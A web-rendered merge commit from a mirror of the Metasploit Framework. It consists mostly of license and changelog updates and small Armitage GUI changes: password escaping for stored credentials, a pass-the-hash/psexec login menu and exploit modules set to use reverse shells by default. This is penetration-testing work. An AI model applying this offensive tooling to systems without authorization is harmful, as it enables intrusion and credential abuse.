infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into web-modules

unstable
Tasos Laskos 2013-01-04 21:33:17 +02:00
parent 3d4d6e9860 7d1752d858
commit e1885cab0b
1670 changed files with 5809 additions and 8957 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@ -22,3 +22,4 @@ tags
*.swp
*.orig
*.rej
*~

5
CONTRIBUTING.md
View File

@ -12,6 +12,11 @@ If your bug is new and you'd like to report it you will need to
first](https://dev.metasploit.com/redmine/account/register). Don't
worry, it's easy and fun and takes about 30 seconds.
When you file a bug report, please inclue your **steps to reproduce**,
full copy-pastes of Ruby stack traces, and any relevant details about
your environment. Without repro steps, your bug will likely be closed.
With repro steps, your bugs will likely be fixed.
## Contributing Metasploit Modules
If you have an exploit that you'd like to contribute to the Metasploit

2
COPYING
View File

@ -1,4 +1,4 @@
Copyright (C) 2006-2012, Rapid7 Inc.
Copyright (C) 2006-2013, Rapid7 Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,

472
THIRD-PARTY.md
View File

@ -18,13 +18,17 @@ Ruby
Copyright (c) 2004 David R. Halliday
- The Zip library located under lib/zip.
Copyright (C) 2002-2004 Thomas Sondergaard
- FastLib located at lib/fastlib.rb
Copyright (C) 2011 Rapid7
- Gem components located under lib/gemcache/
* mime-types - Copyright (C) Austin Ziegler
* rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers.
Portions (c) 2007-2011 Eric Hodel. Portions copyright others, see individual
files for details.
* eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca
* json - Copyright Daniel Luz <dev at mernen dot com>
* pg - Copyright (c) 1997-2012 by the authors
* thin - Copyright (c) Marc-Andre Cournoyer
@ -85,42 +89,6 @@ Ruby
````
PacketFu
========
- The PacketFu library located under lib/packetfu.
Copyright (c) 2008-2012, Tod Beardsley
````
Copyright (c) 2008-2012, Tod Beardsley
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Tod Beardsley nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
````
GPL
===
- The modified TightVNC binaries and their associated source code.
@ -1016,39 +984,55 @@ OpenSSL License
MIT
===
- The SSHKey library located under lib/sshkey.
- The SSHKey library located under lib/sshkey/
Copyright (c) 2011 James Miller
- The Net::SSH library located under lib/net/ssh.
- The Net::SSH library located under lib/net/ssh/
Copyright (c) 2008 Jamis Buck <jamis@37signals.com>
- Anemone located under lib/anemone
- Anemone located under lib/anemone/
Copyright (c) 2009 Vertive, Inc.
- RKelly located under lib/rkelly/
Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette
- Gem components located under lib/gemcache
- Gem components located under lib/gemcache/
* actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson
* actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson
* activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson
* activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson
* activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson
* activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson
* acts_as_list - Copyright (c) 2007 David Heinemeier Hansson
* arel- Copyright (c) 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
* authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic
* builder - Copyright (c) 2003-2012 Jim Weirich (jim.weirich@gmail.com)
* carrierwave - Copyright (c) 2008-2012 Jonas Nicklas
* chunky_png - Copyright (c) 2010 Willem van Bergen
* coderay - By Rob Aldred
* daemons - Copyright (c) 2005-2012 Thomas Uehlinger
* diff-lcs - Copyright 20042011 Austin Ziegler
* diff-lcs - Copyright 2004-2011 Austin Ziegler
* erubis - copyright(c) 2006-2011 kuwata-lab.com all rights reserved.
* formtastic - Copyright (c) 2008-2010 Justin French
* fssm - Copyright (c) 2011 Travis Tilley
* hike - Copyright (c) 2011 Sam Stephenson
* i18n - Copyright (c) 2008 The Ruby I18n team
* ice_cube - Copyright (c) 2010-2012 John Crepezzi
* journey - Copyright (c) 2011 Aaron Patterson
* jquery-rails - Copyright (c) 2010 Andre Arko
* liquid - Copyright (c) 2005, 2006 Tobias Luetke
* mail - Copyright (c) 2009, 2010, 2011, 2012 Mikel Lindsaar
* metasploit_data_models - Copyright (c) 2012, Rapid7, Inc.
* method_source - Copyright (c) 2011 John Mair (banisterfiend)
* multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
* nokogiri - Copyright (c) 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
* polyglot - Copyright (c) 2007 Clifford Heath
* prototype_legacy_helper - No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
* rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen <purl.org/net/chneukirchen>
* rack-cache - Copyright (c) 2008 Ryan Tomayko <http://tomayko.com/about>
* rack-ssl - Copyright (c) 2010 Joshua Peek
* rack-test - Copyright (c) 2008-2009 Bryan Helmkamp, Engine Yard Inc.
* railties - No copyright statement provided
* rake - Copyright (c) 2003, 2004 Jim Weirich
* robots - Copyright (c) 2008 Kyle Maxwell, contributors
* slop - Copyright (c) 2012 Lee Jarvis
* spork - Copyright (c) 2009 Tim Harper
* sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek
* state_machine - Copyright (c) 2006-2012 Aaron Pfeifer
* thor - Copyright (c) 2008 Yehuda Katz
@ -1081,3 +1065,409 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
````
3-Clause BSD
============
- The PacketFu library located under lib/packetfu/
Copyright (c) 2008-2012, Tod Beardsley
- The Kiss FFT library located under external/ruby-kissfft/
Copyright (c) 2003-2010 Mark Borgerding
- The Kiss FFT wrapper layer, located under external/ruby-kissfft/
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
- Armitage, located under external/source/armitage and data/armitage/
Copyright (C) 2010-2012 Raphael Mudge
````
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Tod Beardsley nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
````
Artistic 2.0
============
- Gem components located under lib/gemcache/
* win32-api - Copyright (c) 2003-2011, Daniel J. Berger
* win32-service - Copyright (c) 2003-2011, Daniel J. Berger
* windows-api - Copyright (c) 2003-2011, Daniel J. Berger
* windows-pr - Copyright (c) 2003-2011, Daniel J. Berger
````
Artistic License 2.0 Copyright (c) 2000-2006, The Perl Foundation.
Everyone is permitted to copy and distribute verbatim copies of this license
document, but changing it is not allowed.
Preamble This license establishes the terms under which a given free software
Package may be copied, modified, distributed, and/or redistributed. The intent
is that the Copyright Holder maintains some artistic control over the
development of that Package while still keeping the Package available as open
source and free software.
You are always permitted to make arrangements wholly outside of this license
directly with the Copyright Holder of a given Package. If the terms of this
license do not permit the full use that you propose to make of the Package, you
should contact the Copyright Holder and seek a different licensing arrangement.
Definitions "Copyright Holder" means the individual(s) or organization(s) named
in the copyright notice for the entire Package.
"Contributor" means any party that has contributed code or other material to
the Package, in accordance with the Copyright Holder's procedures.
"You" and "your" means any person who would like to copy, distribute, or modify
the Package.
"Package" means the collection of files distributed by the Copyright Holder,
and derivatives of that collection and/or of those files. A given Package may
consist of either the Standard Version, or a Modified Version.
"Distribute" means providing a copy of the Package or making it accessible to
anyone else, or in the case of a company or organization, to others outside of
your company or organization.
"Distributor Fee" means any fee that you charge for Distributing this Package
or providing support for this Package to another party. It does not mean
licensing fees.
"Standard Version" refers to the Package if it has not been modified, or has
been modified only in ways explicitly requested by the Copyright Holder.
"Modified Version" means the Package, if it has been changed, and such changes
were not explicitly requested by the Copyright Holder.
"Original License" means this Artistic License as Distributed with the Standard
Version of the Package, in its current version or as it may be modified by The
Perl Foundation in the future.
"Source" form means the source code, documentation source, and configuration
files for the Package.
"Compiled" form means the compiled bytecode, object code, binary, or any other
form resulting from mechanical transformation or translation of the Source
form.
Permission for Use and Modification Without Distribution (1) You are permitted
to use the Standard Version and create and use Modified Versions for any
purpose without restriction, provided that you do not Distribute the Modified
Version.
Permissions for Redistribution of the Standard Version (2) You may Distribute
verbatim copies of the Source form of the Standard Version of this Package in
any medium without restriction, either gratis or for a Distributor Fee,
provided that you duplicate all of the original copyright notices and
associated disclaimers. At your discretion, such verbatim copies may or may not
include a Compiled form of the Package.
(3) You may apply any bug fixes, portability changes, and other modifications
made available from the Copyright Holder. The resulting Package will still be
considered the Standard Version, and as such will be subject to the Original
License.
Distribution of Modified Versions of the Package as Source (4) You may
Distribute your Modified Version as Source (either gratis or for a Distributor
Fee, and with or without a Compiled form of the Modified Version) provided that
you clearly document how it differs from the Standard Version, including, but
not limited to, documenting any non-standard features, executables, or modules,
and provided that you do at least ONE of the following:
(a) make the Modified Version available to the Copyright Holder of the Standard
Version, under the Original License, so that the Copyright Holder may include
your modifications in the Standard Version. (b) ensure that installation of
your Modified Version does not prevent the user installing or running the
Standard Version. In addition, the Modified Version must bear a name that is
different from the name of the Standard Version. (c) allow anyone who receives
a copy of the Modified Version to make the Source form of the Modified Version
available to others under (i) the Original License or (ii) a license that
permits the licensee to freely copy, modify and redistribute the Modified
Version using the same licensing terms that apply to the copy that the licensee
received, and requires that the Source form of the Modified Version, and of any
works derived from it, be made freely available in that license fees are
prohibited but Distributor Fees are allowed.
Distribution of Compiled Forms of the Standard Version or Modified Versions
without the Source (5) You may Distribute Compiled forms of the Standard
Version without the Source, provided that you include complete instructions on
how to get the Source of the Standard Version. Such instructions must be valid
at the time of your distribution. If these instructions, at any time while you
are carrying out such distribution, become invalid, you must provide new
instructions on demand or cease further distribution. If you provide valid
instructions or cease distribution within thirty days after you become aware
that the instructions are invalid, then you do not forfeit any of your rights
under this license.
(6) You may Distribute a Modified Version in Compiled form without the Source,
provided that you comply with Section 4 with respect to the Source of the
Modified Version.
Aggregating or Linking the Package (7) You may aggregate the Package (either
the Standard Version or Modified Version) with other packages and Distribute
the resulting aggregation provided that you do not charge a licensing fee for
the Package. Distributor Fees are permitted, and licensing fees for other
components in the aggregation are permitted. The terms of this license apply to
the use and Distribution of the Standard or Modified Versions as included in
the aggregation.
(8) You are permitted to link Modified and Standard Versions with other works,
to embed the Package in a larger work of your own, or to build stand-alone
binary or bytecode versions of applications that include the Package, and
Distribute the result without restriction, provided the result does not expose
a direct interface to the Package.
Items That are Not Considered Part of a Modified Version (9) Works (including,
but not limited to, modules and scripts) that merely extend or make use of the
Package, do not, by themselves, cause the Package to be a Modified Version. In
addition, such works are not considered parts of the Package itself, and are
not subject to the terms of this license.
General Provisions (10) Any use, modification, and distribution of the Standard
or Modified Versions is governed by this Artistic License. By using, modifying
or distributing the Package, you accept this license. Do not use, modify, or
distribute the Package, if you do not accept this license.
(11) If your Modified Version has been derived from a Modified Version made by
someone other than you, you are nevertheless required to ensure that your
Modified Version complies with the requirements of this license.
(12) This license does not grant you the right to use any trademark, service
mark, tradename, or logo of the Copyright Holder.
(13) This license includes the non-exclusive, worldwide, free-of-charge patent
license to make, have made, use, offer to sell, sell, import and otherwise
transfer the Package with respect to any patent claims licensable by the
Copyright Holder that are necessarily infringed by the Package. If you
institute patent litigation (including a cross-claim or counterclaim) against
any party alleging that the Package constitutes direct or contributory patent
infringement, then this Artistic License to you shall terminate on the date
that such litigation is filed.
(14) Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER
AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE
IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL LAW.
UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY
OUT OF THE USE OF THE PACKAGE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
````
Apache 2.0
==========
- Gem components located under lib/gemcache/
* Msgpack - Copyright (c) 2008-2010 FURUHASHI Sadayuki
````
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction, and
distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by the copyright
owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all other entities
that control, are controlled by, or are under common control with that entity.
For the purposes of this definition, "control" means (i) the power, direct or
indirect, to cause the direction or management of such entity, whether by
contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity exercising
permissions granted by this License.
"Source" form shall mean the preferred form for making modifications, including
but not limited to software source code, documentation source, and
configuration files.
"Object" form shall mean any form resulting from mechanical transformation or
translation of a Source form, including but not limited to compiled object
code, generated documentation, and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or Object form,
made available under the License, as indicated by a copyright notice that is
included in or attached to the work (an example is provided in the Appendix
below).
"Derivative Works" shall mean any work, whether in Source or Object form, that
is based on (or derived from) the Work and for which the editorial revisions,
annotations, elaborations, or other modifications represent, as a whole, an
original work of authorship. For the purposes of this License, Derivative Works
shall not include works that remain separable from, or merely link (or bind by
name) to the interfaces of, the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including the original
version of the Work and any modifications or additions to that Work or
Derivative Works thereof, that is intentionally submitted to Licensor for
inclusion in the Work by the copyright owner or by an individual or Legal
Entity authorized to submit on behalf of the copyright owner. For the purposes
of this definition, "submitted" means any form of electronic, verbal, or
written communication sent to the Licensor or its representatives, including
but not limited to communication on electronic mailing lists, source code
control systems, and issue tracking systems that are managed by, or on behalf
of, the Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise designated in
writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf
of whom a Contribution has been received by Licensor and subsequently
incorporated within the Work.
2. Grant of Copyright License.
Subject to the terms and conditions of this License, each Contributor hereby
grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,
irrevocable copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the Work and
such Derivative Works in Source or Object form.
3. Grant of Patent License.
Subject to the terms and conditions of this License, each Contributor hereby
grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,
irrevocable (except as stated in this section) patent license to make, have
made, use, offer to sell, sell, import, and otherwise transfer the Work, where
such license applies only to those patent claims licensable by such Contributor
that are necessarily infringed by their Contribution(s) alone or by combination
of their Contribution(s) with the Work to which such Contribution(s) was
submitted. If You institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work or a
Contribution incorporated within the Work constitutes direct or contributory
patent infringement, then any patent licenses granted to You under this License
for that Work shall terminate as of the date such litigation is filed.
4. Redistribution.
You may reproduce and distribute copies of the Work or Derivative Works thereof
in any medium, with or without modifications, and in Source or Object form,
provided that You meet the following conditions:
You must give any other recipients of the Work or Derivative Works a copy of
this License; and You must cause any modified files to carry prominent notices
stating that You changed the files; and You must retain, in the Source form of
any Derivative Works that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work, excluding those notices
that do not pertain to any part of the Derivative Works; and If the Work
includes a "NOTICE" text file as part of its distribution, then any Derivative
Works that You distribute must include a readable copy of the attribution
notices contained within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one of the following
places: within a NOTICE text file distributed as part of the Derivative Works;
within the Source form or documentation, if provided along with the Derivative
Works; or, within a display generated by the Derivative Works, if and wherever
such third-party notices normally appear. The contents of the NOTICE file are
for informational purposes only and do not modify the License. You may add Your
own attribution notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided that such
additional attribution notices cannot be construed as modifying the License.
You may add Your own copyright statement to Your modifications and may provide
additional or different license terms and conditions for use, reproduction, or
distribution of Your modifications, or for any such Derivative Works as a
whole, provided Your use, reproduction, and distribution of the Work otherwise
complies with the conditions stated in this License.
5. Submission of Contributions.
Unless You explicitly state otherwise, any Contribution intentionally submitted
for inclusion in the Work by You to the Licensor shall be under the terms and
conditions of this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify the terms
of any separate license agreement you may have executed with Licensor regarding
such Contributions.
6. Trademarks.
This License does not grant permission to use the trade names, trademarks,
service marks, or product names of the Licensor, except as required for
reasonable and customary use in describing the origin of the Work and
reproducing the content of the NOTICE file.
7. Disclaimer of Warranty.
Unless required by applicable law or agreed to in writing, Licensor provides
the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied,
including, without limitation, any warranties or conditions of TITLE,
NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are
solely responsible for determining the appropriateness of using or
redistributing the Work and assume any risks associated with Your exercise of
permissions under this License.
8. Limitation of Liability.
In no event and under no legal theory, whether in tort (including negligence),
contract, or otherwise, unless required by applicable law (such as deliberate
and grossly negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special, incidental,
or consequential damages of any character arising as a result of this License
or out of the use or inability to use the Work (including but not limited to
damages for loss of goodwill, work stoppage, computer failure or malfunction,
or any and all other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability.
While redistributing the Work or Derivative Works thereof, You may choose to
offer, and charge a fee for, acceptance of support, warranty, indemnity, or
other liability obligations and/or rights consistent with this License.
However, in accepting such obligations, You may act only on Your own behalf and
on Your sole responsibility, not on behalf of any other Contributor, and only
if You agree to indemnify, defend, and hold each Contributor harmless for any
liability incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work
To apply the Apache License to your work, attach the following boilerplate
notice, with the fields enclosed by brackets "[]" replaced with your own
identifying information. (Don't include the brackets!) The text should be
enclosed in the appropriate comment syntax for the file format. We also
recommend that a file or class name and description of purpose be included on
the same "printed page" as the copyright notice for easier identification
within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
````

BIN
data/armitage/armitage.jar
View File

Binary file not shown.

BIN
data/armitage/cortana.jar
View File

Binary file not shown.

2
data/armitage/readme.txt
View File

@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
7. License
-------
(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license.
(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license.
See section 8 for more information.
lib/jgraphx.jar is used here within the terms of the BSD license offered by

18
data/armitage/whatsnew.txt
View File

@ -1,6 +1,24 @@
Armitage Changelog
==================
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option
- Added an icon to represent Windows 8
- [host] -> Login menu is now built using open services for all
highlighted hosts, not just the first one.
- [host] -> Login items now escape punctuation characters in passwords
before passing them to a framework module.
- Added the windows and linux postgres_payload exploits to the use a
reverse payload by default list.
- Small tweak to allow Armitage to work with Metasploit 4.5 installed
environment on Windows.
Cortana Updates (for scripters)
--------
- &credential_add and &credential_delete no longer break when a
password has creative punctuation in it.
26 Nov 12 (tested against msf 16114)
---------
- Windows command shell tab is now friendlier to commands that prompt

4
external/pcaprub/extconf.rb vendored
View File

@ -9,7 +9,9 @@ puts "\n[*] Running checks for netifaces code added by metasploit project"
puts "-----------------------------------------------------------------"
#uncoment to force ioctl on non windows systems
#@force_ioctl = true
@supported_archs = ["i386-mingw32", "i486-linux", "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"]
@supported_archs = [ "i386-mingw32", "i486-linux", "x86_64-linux",
"universal-darwin10.0", "i386-openbsd4.8", "i386-freebsd8",
"arm-linux-eabi" ]
#arm-linux-eabi tested on maemo5 / N900
puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM

2
external/source/armitage/readme.txt vendored
View File

@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
7. License
-------
(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license.
(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license.
See section 8 for more information.
lib/jgraphx.jar is used here within the terms of the BSD license offered by

4
external/source/armitage/resources/about.html vendored
View File

@ -1,9 +1,9 @@
<html>
<body>
<center><h1>Armitage 1.44</h1></center>
<center><h1>Armitage 1.45</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 26 Nov 12</p>
<br />Release: 4 Jan 13</p>
<br />
<p>Developed by:</p>

BIN
external/source/armitage/resources/windows8.png vendored Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.4 KiB

8
external/source/armitage/scripts-cortana/internal.sl vendored
View File

@ -243,14 +243,18 @@ sub session_exploit {
# credentials API
#
sub _fix_pass {
return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
}
# credential_add("host", "port", "user, "pass", "type")
sub credential_add {
cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P $4");
cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P " . _fix_pass($4));
}
# credential_delete("host", port, "user", "pass");
sub credential_delete {
cmd_safe("creds -a $1 -p $2 -u $3 -P $4 -d");
cmd_safe("creds -a $1 -p $2 -u $3 -P " . _fix_pass($4) . " -d");
}
sub credential_list {

3
external/source/armitage/scripts/armitage.sl vendored
View File

@ -59,6 +59,9 @@ sub showHost {
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
push(@overlay, 'resources/windowsxp.png');
}
else if ("*8*" iswm $match) {
push(@overlay, 'resources/windows8.png');
}
else {
push(@overlay, 'resources/windows7.png');
}

35
external/source/armitage/scripts/attacks.sl vendored
View File

@ -22,7 +22,7 @@ setMissPolicy(%results2, { return @(); });
# %exploits is populated in menus.sl when the client-side attacks menu is constructed
# a list of exploits that should always use a reverse shell... this list needs to grow.
@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php");
@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php", "windows/postgres/postgres_payload", "linux/postgres/postgres_payload");
#
# generate menus for a given OS
@ -599,26 +599,28 @@ sub host_attack_items {
}
}
local('$service $name @options $a $port $foo');
local('$name %options $a $port $host $service');
%options = ohash();
foreach $port => $service (%hosts[$2[0]]['services']) {
$name = $service['name'];
if ($port == 445 && "*Windows*" iswm getHostOS($2[0])) {
push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
}
else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2)));
}
else if ($name eq "microsoft-ds") {
push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
foreach $host ($2) {
foreach $port => $service (%hosts[$host]['services']) {
$name = $service['name'];
if ($port == 445 && "*Windows*" iswm getHostOS($host)) {
%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
}
else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
%options[$name] = lambda(&show_login_dialog, \$service, $hosts => $2);
}
else if ($name eq "microsoft-ds") {
%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
}
}
}
if (size(@options) > 0) {
if (size(%options) > 0) {
$a = menu($1, 'Login', 'L');
foreach $service (@options) {
($name, $foo) = $service;
item($a, $name, $null, $foo);
foreach $name (sorta(keys(%options))) {
item($a, $name, $null, %options[$name]);
}
}
}
@ -678,6 +680,7 @@ sub addFileListener {
$actions["SigningKey"] = $actions["*FILE*"];
$actions["Wordlist"] = $actions["*FILE*"];
$actions["WORDLIST"] = $actions["*FILE*"];
$actions["REXE"] = $actions["*FILE*"];
# set up an action to choose a session
$actions["SESSION"] = lambda(&chooseSession);

1
external/source/armitage/scripts/menus.sl vendored
View File

@ -52,6 +52,7 @@ sub host_selected_items {
item($i, '1. 95/98/2000', '1', setHostValueFunction($2, "os_name", "Micosoft Windows", "os_flavor", "2000"));
item($i, '2. XP/2003', '2', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "XP"));
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
item($h, "Remove Host", 'R', clearHostFunction($2));
}

2
external/source/armitage/scripts/passhash.sl vendored
View File

@ -41,6 +41,7 @@ import ui.*;
# strip any funky characters that will cause this call to throw an exception
$user = replace($user, '\P{Graph}', "");
$hash = fixPass($hash);
[$queue addCommand: $null, "creds -a $host -p 445 -t smb_hash -u $user -P $hash"];
}
@ -106,6 +107,7 @@ sub createCredentialsTab {
$queue = [new armitage.ConsoleQueue: $client];
foreach $entry ($entries) {
($user, $pass, $host) = $entry;
$pass = fixPass($pass);
[$queue addCommand: $null, "creds -d $host -u $user -P $pass"];
}

13
external/source/armitage/scripts/preferences.sl vendored
View File

@ -114,7 +114,12 @@ sub loadPreferences {
sub loadDatabasePreferences {
if ($yaml_file eq "" || !-exists $yaml_file) {
$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
if (thisIsTheirCommercialStuff()) {
$yaml_file = getFileProper($BASE_DIRECTORY, "ui", "config", "database.yml");
}
else {
$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
}
}
if (!-exists $yaml_file) {
@ -340,6 +345,7 @@ sub createPreferencesTab {
sub setupBaseDirectory {
local('%o');
%o = call($client, "module.options", "post", "multi/gather/dns_bruteforce");
if ("NAMELIST" in %o && "default" in %o["NAMELIST"]) {
$BASE_DIRECTORY = getFileParent(getFileParent(getFileParent(getFileParent(%o["NAMELIST"]["default"]))));
$DATA_DIRECTORY = getFileParent(getFileParent(%o["NAMELIST"]["default"]));
@ -385,3 +391,8 @@ sub dataDirectory {
return $f;
}
sub thisIsTheirCommercialStuff {
# check if we're living in a Metasploit 4.5+ installer environment.
return iff("*app*pro*" iswm $BASE_DIRECTORY);
}

19
external/source/armitage/scripts/util.sl vendored
View File

@ -294,6 +294,11 @@ sub startMetasploit {
[System exit: 0];
}
# if the user chooses c:\metasploit AND we're in the 4.5 environment... adjust
if (-exists getFileProper($msfdir, "apps", "pro", "msf3")) {
$msfdir = getFileProper($msfdir, "apps", "pro");
}
